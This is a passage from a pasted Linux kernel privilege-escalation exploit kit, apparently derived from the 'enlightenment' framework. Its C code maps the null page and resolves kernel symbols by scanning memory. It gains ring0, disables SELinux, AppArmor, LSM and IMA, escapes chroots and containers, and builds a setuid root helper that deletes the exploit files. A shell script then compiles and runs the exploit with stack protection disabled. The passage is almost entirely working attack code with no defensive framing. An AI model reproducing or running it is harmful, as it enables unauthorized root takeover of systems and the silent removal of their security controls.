  1681.     ret = stat("/bin/bash", &st);
  1682.  
  1683.     readlink("/bin/sh", buf, PATH_MAX);
  1684.  
  1685.     setgroups(0, NULL); // uses CAP_SETGID, we don't care if it succeeds
  1686.                 // though it should always
  1687.  
  1688.     // change back to saved working directory
  1689.     if (cwd_dirfd >= 0)
  1690.         fchdir(cwd_dirfd);
  1691.  
  1692.     /* if /bin/sh points to dash and /bin/bash exists, use /bin/bash */
  1693.         printf(" [+] UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid());
  1694.     printf(" [+] Run ./suid \"ls -la;id\":\n");
  1695.     execl("/bin/sh", "sh", "-c", "echo '#include <stdio.h>\nint main(int argc, char *argv[])\n{setuid(0);setgid(0);system(argv[1]);return 0;}' > suid.c; gcc suid.c -o suid;chown 0:0 suid; chmod +s suid; rm suid.c;./suid \"rm exp_abacus.so exploit exp_abacus.c exploit.c\";./suid \"ls -la;id\"", NULL);
  1696.  
  1697.     fprintf(stdout, " [+] Failed to exec rootshell\n");
  1698. }
  1699.  
  1700. static inline void __cpuid(unsigned int *eax, unsigned int *ebx, unsigned int *ecx,
  1701.                 unsigned int *edx)
  1702. {
  1703.     asm volatile("cpuid"
  1704.         : "=a" (*eax),
  1705.           "=b" (*ebx),
  1706.           "=c" (*ecx),
  1707.           "=d" (*edx)
  1708.         : "0" (*eax), "2" (*ecx));
  1709. }
  1710.  
  1711. static inline void cpuid_count(unsigned int op, int count, unsigned int *eax, unsigned int *ebx,
  1712.                 unsigned int *ecx, unsigned int *edx)
  1713. {
  1714.     *eax = op;
  1715.     *ecx = count;
  1716.     __cpuid(eax, ebx, ecx, edx);
  1717. }
  1718.  
  1719. static bool smep_chicken_out(void)
  1720. {
  1721.     unsigned int eax, ebx, ecx, edx;
  1722.     cpuid_count(7, 0, &eax, &ebx, &ecx, &edx);
  1723.  
  1724.     if (ebx & (1 << 7)) {
  1725.         char c;
  1726.         printf(" [-] SMEP detected, this exploit will very likely fail on recent kernels.  Continue? (y/N)\n");
  1727.         c = getchar();
  1728.         if (c == 'y' || c == 'Y')
  1729.             return false;
  1730.         return true;
  1731.     }
  1732.  
  1733.     return false;
  1734. }
  1735.  
  1736. int pa__init(void *m)
  1737. {
  1738.     char cwd[4096];
  1739.     char c;
  1740.  
  1741.     // save off the current working directory so we can change back to
  1742.     // it after breaking out of any chroots
  1743.     getcwd(cwd, sizeof(cwd));
  1744.     cwd_dirfd = open(cwd, O_RDONLY | O_DIRECTORY);
  1745.  
  1746.     /* page some things in */
  1747.     mlock(&own_the_kernel, 0x1000);
  1748.     c = *(volatile char *)&own_the_kernel;
  1749.     mlock(&exp_state, 0x1000);
  1750.     mlock(&bella_mafia_quackafella_records_incorporated_by_rhyme_syndicate_three_yellow_men_trillionaire_club, 0x1000);
  1751.     c = *(volatile char *)&bella_mafia_quackafella_records_incorporated_by_rhyme_syndicate_three_yellow_men_trillionaire_club;
  1752.     mlock(&give_it_to_me_any_way_you_can, 0x1000);
  1753.     c = *(volatile char *)&give_it_to_me_any_way_you_can;
  1754.     mlock(&exit_kernel, 0x1000);
  1755.     c = *(volatile char *)&exit_kernel;
  1756.     mlock(&make_range_readwrite, 0x1000);
  1757.     c = *(volatile char *)&make_range_readwrite;
  1758.     mlock(&make_range_readonly, 0x1000);
  1759.     c = *(volatile char *)&make_range_readonly;
  1760.     mlock(&get_kallsyms_lookup_name, 0x1000);
  1761.     c = *(volatile char *)&get_kallsyms_lookup_name;
  1762.  
  1763.     sync();
  1764.  
  1765.     get_segment_descriptors();
  1766.  
  1767.     exit_stack = (char *)calloc(1, 1024 * 1024);
  1768.     if (exit_stack == NULL) {
  1769.         fprintf(stdout, "Unable to alloc exit_stack\n");
  1770.         exit(1);
  1771.     }
  1772.     exp_state.exit_stack = exit_stack;
  1773.  
  1774. #ifndef NON_NULL_ONLY
  1775.     if ((personality(0xffffffff)) != PER_SVR4) {
  1776.         mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
  1777.         if (mem != NULL) {
  1778.             mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
  1779.             if (mem != NULL) {
  1780.                 fprintf(stdout, "UNABLE TO MAP ZERO PAGE!\n");
  1781.                 goto boo_hiss;
  1782.             }
  1783.         }
  1784.     } else {
  1785.         main_ret = mprotect(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
  1786.         if (main_ret == -1) {
  1787.             fprintf(stdout, "UNABLE TO MPROTECT ZERO PAGE!\n");
  1788.             goto boo_hiss;
  1789.         }
  1790.     }
  1791.     goto great_success;
  1792. boo_hiss:
  1793. #ifdef HAVE_SELINUX
  1794.     if (exp_state.run_from_main == 1 && is_selinux_enabled()) {
  1795.         security_context_t scontext;
  1796.         context_t newcontext;
  1797.         int retval;
  1798.  
  1799.         retval = getcon(&scontext);
  1800.         if (retval < 0)
  1801.             goto oh_fail;
  1802.  
  1803.         if (strstr(scontext, ":wine_t:")) {
  1804.             fprintf(stdout, "allow_unconfined_mmap_low must actually work on this machine!\n");
  1805.             /* don't repeat */
  1806.             exit(1);
  1807.         }
  1808.  
  1809.         fprintf(stdout, "But wait!  Perhaps SELinux can revive this dead exploit...\n");
  1810.         newcontext = context_new(scontext);
  1811.         freecon(scontext);
  1812.         retval = context_type_set(newcontext, "wine_t");
  1813.         if (retval)
  1814.             goto oh_fail;
  1815.         scontext = context_str(newcontext);
  1816.         if (scontext == NULL)
  1817.             goto oh_fail;
  1818.         if (security_check_context(scontext) < 0)
  1819.             goto oh_fail;
  1820.         retval = setexeccon(scontext);
  1821.         if (retval < 0)
  1822.             goto oh_fail;
  1823.         context_free(newcontext);
  1824.         fprintf(stdout, "This looks promising!\n");
  1825.         execl("/proc/self/exe", NULL);
  1826.     }
  1827. oh_fail:
  1828.     fprintf(stdout, "Nope ;(\n");
  1829. #endif
  1830.     exit(1);
  1831. great_success:
  1832.     fprintf(stdout, " [+] MAPPED ZERO PAGE!\n");
  1833. #endif
  1834.  
  1835.     add_exploit_modules();
  1836.  
  1837.     if (num_exploits == 0) {
  1838.         fprintf(stdout, "No exploit modules detected, exiting.\n");
  1839.         exit(1);
  1840.     }
  1841.  
  1842.        main_ret=0;
  1843.  
  1844.     prepare = modules[main_ret].prep;
  1845.     trigger = modules[main_ret].trigger;
  1846.     ring0_cleanup = modules[main_ret].ring0_cleanup;
  1847.     if (ring0_cleanup) {
  1848.         char c;
  1849.         mlock(ring0_cleanup, 0x1000);
  1850.         c = *(volatile char *)ring0_cleanup;
  1851.     }
  1852.     get_exploit_state_ptr = modules[main_ret].get_exploit_state_ptr;
  1853.     post = modules[main_ret].post;
  1854.     requires_null_page = modules[main_ret].requires_null_page;
  1855.     requires_symbols_to_trigger = modules[main_ret].requires_symbols_to_trigger;
  1856.  
  1857.     exp_state.get_kernel_sym = (_get_kernel_sym)&get_kernel_sym;
  1858.     exp_state.own_the_kernel = (void *)&own_the_kernel;
  1859.     exp_state.exit_kernel = (void *)&exit_kernel;
  1860.     get_exploit_state_ptr(&exp_state);
  1861.  
  1862.     our_uid = getuid();
  1863.  
  1864.     set_fs_root = (_set_fs_root)get_kernel_sym("set_fs_root");
  1865.     set_fs_pwd = (_set_fs_pwd)get_kernel_sym("set_fs_pwd");
  1866.     virt_addr_valid = (_virt_addr_valid)get_kernel_sym("__virt_addr_valid");
  1867.     vc_sock_stat = (unsigned long)get_kernel_sym("vc_sock_stat");
  1868.     prepare_ve0_process = (_prepare_ve0_process)get_kernel_sym("prepare_ve0_process");
  1869.     init_task = (unsigned long *)get_kernel_sym("init_task");
  1870.     init_fs = (unsigned long)get_kernel_sym("init_fs");
  1871.     default_exec_domain = (unsigned long)get_kernel_sym("default_exec_domain");
  1872.     bad_file_ops = (unsigned long *)get_kernel_sym("bad_file_ops");
  1873.     bad_file_aio_read = (unsigned long)get_kernel_sym("bad_file_aio_read");
  1874.     ima_audit = (int *)get_kernel_sym("ima_audit");
  1875.     ima_file_mmap = (unsigned char *)get_kernel_sym("ima_file_mmap");
  1876.     ima_bprm_check = (unsigned char *)get_kernel_sym("ima_bprm_check");
  1877.     ima_path_check = (unsigned char *)get_kernel_sym("ima_path_check");
  1878.     ima_file_check = (unsigned char *)get_kernel_sym("ima_file_check");
  1879.     selinux_enforcing = (int *)get_kernel_sym("selinux_enforcing");
  1880.     selinux_enabled = (int *)get_kernel_sym("selinux_enabled");
  1881.     apparmor_enabled = (int *)get_kernel_sym("apparmor_enabled");
  1882.     apparmor_complain = (int *)get_kernel_sym("apparmor_complain");
  1883.     apparmor_audit = (int *)get_kernel_sym("apparmor_audit");
  1884.     apparmor_logsyscall = (int *)get_kernel_sym("apparmor_logsyscall");
  1885.     security_ops = (unsigned long *)get_kernel_sym("security_ops");
  1886.     default_security_ops = get_kernel_sym("default_security_ops");
  1887.     sel_read_enforce = get_kernel_sym("sel_read_enforce");
  1888.     audit_enabled = (int *)get_kernel_sym("audit_enabled");
  1889.     commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
  1890.     prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred");
  1891.     xen_start_info = (unsigned long *)get_kernel_sym("xen_start_info");
  1892.     ptmx_fops = (unsigned long *)get_kernel_sym("ptmx_fops");
  1893.     mark_rodata_ro = get_kernel_sym("mark_rodata_ro");
  1894.     set_kernel_text_ro = get_kernel_sym("set_kernel_text_ro");
  1895.     make_lowmem_page_readonly = (_make_lowmem_page_readonly)get_kernel_sym("make_lowmem_page_readonly");
  1896.     make_lowmem_page_readwrite = (_make_lowmem_page_readwrite)get_kernel_sym("make_lowmem_page_readwrite");
  1897.  
  1898.     if (smep_chicken_out())
  1899.         exit(1);
  1900.  
  1901.     main_ret = prepare(mem);
  1902.     if (main_ret == STRAIGHT_UP_EXECUTION_AT_NULL) {
  1903.         mem[0] = '\xff';
  1904.         mem[1] = '\x25';
  1905.         *(unsigned int *)&mem[2] = (sizeof(unsigned long) != sizeof(unsigned int)) ? 0 : 6;
  1906.         *(unsigned long *)&mem[6] = (unsigned long)&own_the_kernel;
  1907.     } else if (main_ret == EXIT_KERNEL_TO_NULL) {
  1908.         mem[0] = '\xff';
  1909.         mem[1] = '\x15';
  1910.         *(unsigned int *)&mem[2] = (sizeof(unsigned long) != sizeof(unsigned int)) ? 6 : 12;
  1911.         mem[6] = '\xff';
  1912.         mem[7] = '\x25';
  1913.         *(unsigned int *)&mem[8] = (sizeof(unsigned long) != sizeof(unsigned int)) ? sizeof(unsigned long) : 16;
  1914.         *(unsigned long *)&mem[12] = (unsigned long)&own_the_kernel;
  1915.         *(unsigned long *)&mem[12 + sizeof(unsigned long)] = (unsigned long)&exit_kernel;
  1916.     } else if ((main_ret & EXECUTE_AT_NONZERO_OFFSET) == EXECUTE_AT_NONZERO_OFFSET) {
  1917.         int off = main_ret & 0xfff;
  1918.         mem[off] = '\xff';
  1919.         mem[off + 1] = '\x25';
  1920.         *(unsigned int *)&mem[off + 2] = (sizeof(unsigned long) != sizeof(unsigned int)) ? 0 : off + 6;
  1921.         *(unsigned long *)&mem[off + 6] = (unsigned long)&own_the_kernel;
  1922.     }
  1923.  
  1924.     /* trigger it, and handle the exit_kernel case */
  1925.     trigger_get_return();
  1926.  
  1927.     if (return_to_process_context == 1) {
  1928.         int fd = open("/dev/ptmx", O_RDWR);
  1929.         struct iovec iov;
  1930.  
  1931.         if (fd < 0) {
  1932.             fprintf(stdout, " [-] Unable to open /dev/ptmx to change to process context.\n");
  1933.             exit(1);
  1934.         }
  1935.         iov.iov_base = &iov;
  1936.         iov.iov_len = sizeof(iov);
  1937.         readv(fd, &iov, 1);
  1938.     }
  1939.  
  1940.     if (exp_state.got_ring0) {
  1941.         fprintf(stdout, " [+] Got ring0!\n");
  1942.     } else {
  1943.         fprintf(stdout, "didn't get ring0, bailing\n");
  1944.         exit(0);
  1945.     }
  1946.  
  1947.     if (return_to_process_context == 2)
  1948.         printf(" [+] Adjusted from interrupt handler to process context\n");
  1949.     else if (return_to_process_context == 1)
  1950.         printf(" [-] Failed ring0 execution after attempting process context re-entry\n");
  1951.     if (exp_state.kallsyms_lookup_name)
  1952.         printf(" [+] Obtained internal symbol table for extended functionality\n");
  1953.     printf(" [+] Detected %s %dk stacks, with current at %p%s\n",
  1954.         twofourstyle ? "2.4 style" : "2.6/3.x style",
  1955.         eightk_stack ? 8 : 4, (char *)current_addr,
  1956.         (cred_support || (commit_creds && prepare_kernel_cred)) ? " and cred support" : "");
  1957.     if (raised_caps)
  1958.         fprintf(stdout, " [+] Raised to full old-style capabilities\n");
  1959.     if (cred_offset)
  1960.         fprintf(stdout, " [+] cred ptrs offset found at 0x%04x in task struct\n", cred_offset);
  1961.     if (init_cred_addr)
  1962.         fprintf(stdout, " [+] init_cred found at %p\n", (char *)init_cred_addr);
  1963.  
  1964.     {
  1965.         char msg[64] = {};
  1966.  
  1967.         if (what_we_do & DISABLED_APPARMOR)
  1968.             strcat(msg, " AppArmor");
  1969.         if (what_we_do & DISABLED_SELINUX)
  1970.             strcat(msg, " SELinux");
  1971.         if (what_we_do & DISABLED_LSM)
  1972.             strcat(msg, " LSM");
  1973.         if (what_we_do & DISABLED_IMA)
  1974.             strcat(msg, " IMA");
  1975.         if (!what_we_do)
  1976.             strcpy(msg, " nothing, what an insecure machine!");
  1977.         fprintf(stdout, " [+] Disabled security of :%s\n", msg);
  1978.     }
  1979.     if (fs_offset) {
  1980.         printf(" [+] Found ->fs offset at 0x%x\n", fs_offset);
  1981.         if (init_task && init_fs)
  1982.             printf(" [+] Broke out of any chroots or mnt namespaces\n");
  1983.     }
  1984.     if (vserver_offset) {
  1985.         printf(" [+] Found vserver id info at offset 0x%x\n", vserver_offset);
  1986.     }
  1987.     if (has_vserver) {
  1988.         printf(" [+] Broke out of any vserver container\n");
  1989.     }
  1990.     if (prepare_ve0_process) {
  1991.         printf(" [+] Broke out of any OpenVZ container\n");
  1992.     }
  1993.  
  1994.     if (xen_detected && mark_rodata_ro && set_kernel_text_ro && (make_lowmem_page_readonly == NULL || make_lowmem_page_readwrite == NULL))
  1995.         fprintf(stdout, " [+] Unable to issue Xen hypercall for .text modification -- modification disabled\n");
  1996.  
  1997.     if (exp_state.got_root == 1)
  1998.         fprintf(stdout, " [+] Got root!\n");
  1999.     else {
  2000.         fprintf(stdout, " [+] Failed to get root :(\n");
  2001.         exit(0);
  2002.     }
  2003.  
  2004.     main_ret = post();
  2005.     if (main_ret == RUN_ROOTSHELL)
  2006.         exec_rootshell();
  2007.     else if (main_ret == CHMOD_SHELL) {
  2008.         chmod("/bin/sh", 04755);
  2009.         fprintf(stdout, "/bin/sh is now setuid root.\n");
  2010.     } else if (main_ret == FUNNY_PIC_AND_ROOTSHELL) {
  2011.         system("gthumb --fullscreen ./funny.jpg");
  2012.         exec_rootshell();
  2013.     }
  2014.  
  2015.     return 0;
  2016. }
  2017.  
  2018. void pa__done(void *m)
  2019. {
  2020.     return;
  2021. }
  2022.  
  2023. static inline unsigned long find_starting_string(void)
  2024. {
  2025.     unsigned long i, x;
  2026.     unsigned char *mem;
  2027.  
  2028.     for (x = 0; valid_ranges[x][0]; x++) {
  2029.         mem = (unsigned char *)valid_ranges[x][0];
  2030.     for (i = 0; i < (valid_ranges[x][1] - valid_ranges[x][0]) - 100; i++) {
  2031.         if (!memcmp(&mem[i], "\0%s+%#lx/%#lx [%s]", 19) || // 2.6.18 and earlier
  2032.             !memcmp(&mem[i], "\0+%#lx/%#lx [%s]", 17) || // before 3.8
  2033.             !memcmp(&mem[i], "\0+%#lx/%#lx", 12)) // 3.8 and later
  2034.             return (unsigned long)mem + i + 1;
  2035.     }
  2036.     }
  2037.  
  2038.     return 0UL;
  2039. }
  2040.  
  2041. static inline unsigned long find_reference_to_starting_string(unsigned long addr)
  2042. {
  2043.     unsigned int intaddr = (unsigned int)(addr & 0xFFFFFFFF);
  2044.     unsigned long i, x;
  2045.     unsigned char *mem;
  2046.  
  2047.     for (x = 0; valid_ranges[x][0]; x++) {
  2048.         mem = (unsigned char *)valid_ranges[x][0];
  2049.     for (i = 0; i < (valid_ranges[x][1] - valid_ranges[x][0]) - 100; i++) {
  2050. #ifdef __x86_64__
  2051.         if (mem[i] == 0x48 && *(unsigned int *)&mem[i+3] == intaddr)
  2052. #else
  2053.         if ((mem[i] == 0x68 && *(unsigned int *)&mem[i+1] == intaddr) ||
  2054.             (mem[i] == 0xc7 && mem[i+1] == 0x44 && mem[i+2] == 0x24 && mem[i+3] == 0x04 && *(unsigned int *)&mem[i+4] == intaddr))
  2055. #endif
  2056.             return (unsigned long)mem + i;
  2057.     }
  2058.     }
  2059.  
  2060.     return 0UL;
  2061. }
  2062.  
  2063. static inline unsigned long find_call_to_kallsyms_lookup(unsigned char *mem, unsigned long len, unsigned long addr)
  2064. {
  2065.     unsigned long idx = addr - (unsigned long)mem;
  2066.     unsigned long i;
  2067.  
  2068.     for (i = idx; i > idx - 0x100; i--) {
  2069.         if (mem[i] == 0xe8 && *(int *)&mem[i+1] > -0x1000 && *(int *)&mem[i+1] < 0)
  2070.             return (unsigned long)mem + i;
  2071.     }
  2072.  
  2073.     return 0UL;
  2074. }
  2075.  
  2076. static inline unsigned long get_call_target(unsigned long addr)
  2077. {
  2078.     return addr + 5 + *(int *)(addr + 1);
  2079.  
  2080. }
  2081.  
  2082. static inline unsigned long find_kallsyms_expand_symbol(unsigned char *mem, unsigned long len, unsigned long addr)
  2083. {
  2084.     unsigned long i;
  2085.     unsigned long startidx = addr - (unsigned long)mem;
  2086.     int count = 0;
  2087.  
  2088.     for (i = startidx + 0x20; i < startidx + 0x100; i++) {
  2089.         // find near call followed by a test r12/r13
  2090. #ifdef __x86_64__
  2091.         if (mem[i] == 0xe8 && mem[i+3] > 0xF0 && mem[i+4] == 0xFF && mem[i+5] == 0x4d)
  2092. #else
  2093.         if ((mem[i] == 0xe8 && mem[i+3] > 0xF0 && mem[i+4] == 0xFF && mem[i+5] == 0x85) ||
  2094.             // interleaved mov
  2095.             (mem[i] == 0xe8 && mem[i+3] > 0xF0 && mem[i+4] == 0xFF && mem[i+5] == 0x8b && mem[i+8] == 0x85))
  2096. #endif
  2097.             return get_call_target((unsigned long)mem + i);
  2098.     }
  2099.  
  2100.     return 0UL;
  2101. }
  2102.  
  2103. static inline bool call_to_function_pointer_nearby(unsigned char *mem, unsigned long len, unsigned long addr)
  2104. {
  2105.     unsigned long startidx = addr - (unsigned long)mem;
  2106.     unsigned long i;
  2107.  
  2108.     for (i = startidx; i < startidx + 0x30; i++) {
  2109.         // look for call reg / test eax, eax
  2110. #ifdef __x86_64__
  2111.         if (mem[i] == 0x41 && mem[i+1] == 0xff && mem[i+3] == 0x85 && mem[i+4] == 0xc0)
  2112. #else
  2113.         if ((mem[i] == 0xff && mem[i+2] == 0x85 && mem[i+3] == 0xc0) ||
  2114.             (mem[i] == 0xff && mem[i+3] == 0xff && mem[i+4] == 0xff && mem[i+5] == 0xff && mem[i+6] == 0x85 && mem[i+7] == 0xc0))
  2115. #endif
  2116.             return true;
  2117.     }
  2118.  
  2119.     return false;
  2120. }
  2121.  
  2122. static inline bool has_return_value_checking_call_nearby(unsigned char *mem, unsigned long len, unsigned long addr)
  2123. {
  2124.     unsigned long startidx = addr - (unsigned long)mem;
  2125.     unsigned long i;
  2126.  
  2127.     for (i = startidx; i < startidx + 0x30; i++) {
  2128.         // look for relative call / test eax, eax
  2129.         if (mem[i] == 0xe8 && (mem[i+4] == 0x00 || mem[i+4] == 0xff) && mem[i+5] == 0x85 && mem[i+6] == 0xc0) {
  2130.             // now look for the jnz / mov / jmp sequence
  2131. #ifdef __x86_64__
  2132.             if (mem[i+7] == 0x75 && mem[i+9] == 0x48 && mem[i+17] == 0xeb)
  2133. #else
  2134.             if (mem[i+7] == 0x75 && mem[i+9] == 0x8b && mem[i+16] == 0xeb)
  2135. #endif
  2136.                 return true;
  2137.         }
  2138.     }
  2139.  
  2140.     return false;
  2141. }
  2142.  
  2143. static inline unsigned long get_function_address(unsigned char *mem, unsigned long len, unsigned long addr)
  2144. {
  2145.     unsigned long startidx = addr - (unsigned long)mem;
  2146.     unsigned long i;
  2147.  
  2148.     for (i = startidx; i > startidx - 0x100; i--) {
  2149. #ifdef __x86_64__
  2150.         if (!memcmp(&mem[i], "\x55\x48\x89\xe5", 4))
  2151. #else
  2152.         if (!memcmp(&mem[i], "\x55\x89\xe5", 3) || !memcmp(&mem[i], "\x55\x89\xc5", 3))
  2153. #endif
  2154.             return (unsigned long)mem + i;
  2155.     }
  2156.  
  2157.     return 0UL;
  2158. }
  2159.  
  2160. static inline unsigned long find_kallsyms_lookup_name(unsigned char *mem, unsigned long len, unsigned long addr)
  2161. {
  2162.     unsigned long startidx = addr - (unsigned long)mem - 0x2000;
  2163.     unsigned long endidx = addr - (unsigned long)mem + 0x2000;
  2164.     unsigned long i;
  2165.  
  2166.     for (i = startidx; i < endidx; i++) {
  2167.         if (mem[i] == 0xe8 && get_call_target((unsigned long)mem + i) == addr) {
  2168.             // found a call to kallsyms_expand_symbol
  2169.             if (call_to_function_pointer_nearby(mem, len, (unsigned long)mem + i + 5))
  2170.                 continue;
  2171.             if (!has_return_value_checking_call_nearby(mem, len, (unsigned long)mem + i + 5))
  2172.                 continue;
  2173.             return get_function_address(mem, len, (unsigned long)mem + i);
  2174.         }
  2175.     }
  2176.  
  2177.     return 0UL;
  2178. }
  2179.  
  2180. static unsigned long get_kallsyms_lookup_name(void)
  2181. {
  2182.     unsigned char *base;
  2183.     unsigned long len;
  2184.     unsigned long start_string;
  2185.     unsigned long start_string_ref;
  2186.     unsigned long kallsyms_lookup_call;
  2187.     unsigned long kallsyms_lookup;
  2188.     unsigned long kallsyms_expand_symbol;
  2189.     unsigned long kallsyms_lookup_name_func;
  2190.     int i;
  2191.  
  2192. #ifdef __x86_64__
  2193.     find_kernel_ranges();
  2194. #else
  2195.     /* hack for now */
  2196.     valid_ranges[0][0] = KERNEL_BASE + 0x01000000;
  2197.     valid_ranges[0][1] = valid_ranges[0][0] + (1024 * 1024 * 16);
  2198. #endif
  2199.  
  2200.     if (!valid_ranges[0][0] || !valid_ranges[0][1])
  2201.         return 0UL;
  2202.     start_string = find_starting_string();
  2203.     if (!start_string)
  2204.         return 0UL;
  2205.     start_string_ref = find_reference_to_starting_string(start_string);
  2206.     if (!start_string_ref)
  2207.         return 0UL;
  2208.     for (i = 0; i < NUM_RANGES; i++) {
  2209.         if (start_string_ref >= valid_ranges[i][0] && start_string_ref < valid_ranges[i][1]) {
  2210.             base = (unsigned char *)valid_ranges[i][0];
  2211.             len = valid_ranges[i][1] - valid_ranges[i][0];
  2212.             break;
  2213.         }
  2214.     }
  2215.     kallsyms_lookup_call = find_call_to_kallsyms_lookup(base, len, start_string_ref);
  2216.     if (!kallsyms_lookup_call)
  2217.         return 0UL;
  2218.     kallsyms_lookup = get_call_target(kallsyms_lookup_call);
  2219.     kallsyms_expand_symbol = find_kallsyms_expand_symbol(base, len, kallsyms_lookup);
  2220.     if (!kallsyms_expand_symbol)
  2221.         return 0UL;
  2222.     kallsyms_lookup_name_func = find_kallsyms_lookup_name(base, len, kallsyms_expand_symbol);
  2223.  
  2224.     return kallsyms_lookup_name_func;
  2225. }
  2226.  
  2227. int main(void)
  2228. {
  2229.   exp_state.run_from_main = 1;
  2230.   pa__init(NULL);
  2231.   return 0;
  2232. }
  2233. _EOF
  2234.  
  2235. GCC=gcc
  2236. IS_64=`uname -m`
  2237. LINK_FLAG="-ldl"
  2238. OPT_FLAG="-fomit-frame-pointer -O2"
  2239. if [ "$IS_64" = "x86_64" ]; then
  2240.   OPT_FLAG="-m64 -fomit-frame-pointer -O2"
  2241. fi
  2242. OPT_FLAG="$OPT_FLAG -DNON_NULL_ONLY"
  2243.  
  2244. for FILE in exp_*.c; do
  2245.     printf "Compiling $FILE..."
  2246.     $GCC -fno-stack-protector -fPIC $OPT_FLAG -shared -o `printf $FILE | cut -d"." -f1`.so $FILE $LINK_FLAG 2> /dev/null
  2247.     if [ "$?" = "1" ]; then
  2248.        $GCC -fPIC $OPT_FLAG -shared -o `printf $FILE | cut -d"." -f1`.so $FILE $LINK_FLAG 2> /dev/null
  2249.        if [ "$?" = "1" ]; then
  2250.      printf "failed.\n"
  2251.        else
  2252.          printf "OK.\n"
  2253.        fi
  2254.     else
  2255.       printf "OK.\n"
  2256.     fi
  2257. done
  2258.  
  2259. ESCAPED_PWD=`pwd | sed 's/\//\\\\\//g'`
  2260. MINADDR=`cat /proc/sys/vm/mmap_min_addr 2> /dev/null`
  2261. if [ "$1" != "" -o "$MINADDR" = "" -o "$MINADDR" = "0" ]; then
  2262.     sed "s/\/home\/spender/$ESCAPED_PWD/g" exploit.c > exploit1.c
  2263.     mv exploit.c exploit2.c
  2264.     mv exploit1.c exploit.c
  2265.     $GCC -fno-stack-protector -fno-pie $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null
  2266.     if [ "$?" = "1" ]; then
  2267.         $GCC -fno-stack-protector $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null
  2268.     fi
  2269.     if [ "$?" = "1" ]; then
  2270.         $GCC $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null
  2271.     fi
  2272.     mv -f exploit2.c exploit.c
  2273.     ./exploit
  2274. else
  2275.     sed "s/\/home\/spender/$ESCAPED_PWD/g" exploit.c > exploit1.c
  2276.     mv exploit.c exploit2.c
  2277.     mv exploit1.c exploit.c
  2278.     $GCC -fno-stack-protector -fno-pie $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null
  2279.     if [ "$?" = "1" ]; then
  2280.        $GCC -fno-stack-protector $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null
  2281.     fi
  2282.     if [ "$?" = "1" ]; then
  2283.        $GCC $OPT_FLAG -o exploit exploit.c $LINK_FLAG 2> /dev/null
  2284.     fi
  2285.     mv -f exploit2.c exploit.c
  2286.     ./exploit
  2287. fi
Add Comment
Please, Sign In to add comment